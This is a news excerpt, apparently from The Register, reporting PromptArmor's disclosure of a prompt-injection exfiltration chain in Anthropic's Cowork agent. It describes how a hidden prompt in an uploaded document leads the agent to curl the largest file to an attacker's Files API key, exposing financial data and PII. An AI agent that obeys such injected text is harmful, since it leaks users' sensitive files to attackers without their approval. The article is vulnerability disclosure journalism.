
"Anthropic's tendency to wave off prompt-injection risks is rearing its head in the company's new Cowork productivity AI, which suffers from a Files API exfiltration attack chain first disclosed last October and acknowledged but not fixed by Anthropic. PromptArmor, a security firm specializing in the discovery of AI vulnerabilities, reported on Wednesday that Cowork can be tricked via prompt injection into transmitting sensitive files to an attacker's Anthropic account, without any additional user approval once access has been granted."
"The process is relatively simple and, as PromptArmor explains, part of an "ever-growing" attack surface - a risk amplified by Cowork being pitched at non-developer users who may not think twice about which files and folders they connect to an AI agent. Cowork, launched in research preview on Monday, is designed to automate office work by scanning files such as spreadsheets and other everyday documents that desk workers interact with daily."
"In order to trigger the attack, all a potential victim needs to do is connect Cowork to a local folder containing sensitive information, upload a document containing a hidden prompt injection, and voilà - when Cowork analyzes those files, the injected prompt triggers. PromptArmor's proof of concept used a curl command to Anthropic's file upload API, asking it to upload the largest available file to the attacker's API key, making that file available to the attacker through their own Anthropic account."
Cowork's Files API is vulnerable to a prompt-injection exfiltration chain that allows uploaded documents with hidden prompts to cause automatic transmission of sensitive files to an attacker-controlled Anthropic account. The attack requires only that a user grant Cowork access to a folder and that a malicious file be present; no further approvals are required once access is given. PromptArmor demonstrated a proof of concept using a curl command to upload the largest available file to an attacker's API key, then queried the exfiltrated file via Claude to extract financial details and PII. The flaw follows a previously reported Files API exfiltration report that Anthropic acknowledged but did not fully fix.
Read at Theregister
Unable to calculate read time
Collection
[
|
...
]